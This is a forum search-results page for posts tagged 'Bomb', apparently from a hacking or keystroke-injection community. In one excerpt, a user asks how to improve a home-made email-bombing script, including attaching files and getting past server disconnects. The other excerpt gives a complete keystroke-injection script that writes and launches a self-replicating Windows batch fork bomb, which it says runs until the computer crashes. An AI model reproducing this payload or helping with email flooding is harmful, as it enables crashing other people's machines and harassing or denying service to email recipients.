Search the Community
Showing results for tags 'Bomb'.
-
Hello community, Nice to be hear. I just wondered is their a more effective way of email bombing than I am currently doing? I have a simple home made python script which allows me to connect to a Google account I create ( Basic I know ) I am trying to work on over Email provider support. But anyway... I can't get past the " Text only input " is there a way to send files in email bomb attacks? Also how would this be done and is there a way to get past the terminal from cutting out due to the server closing the connection? is this due to the email service closing due to the volume of e
-
This a windows fork bomb. When the script gets run it creates a batch file which continuously starts its self until the computer crashes. DELAY 3000 GUI R DELAY 500 STRING cmd.exe DELAY 1000 ENTER DELAY 1000 STRING cd Desktop ENTER STRING copy con forkbomb.bat ENTER STRING @echo off ENTER STRING :start CTRL-S DELAY 500 STRING start forkbomb.bat ENTER STRING goto start ENTER CTRL-Z ENTER STRING forkbomb.bat ENTER ALT-F4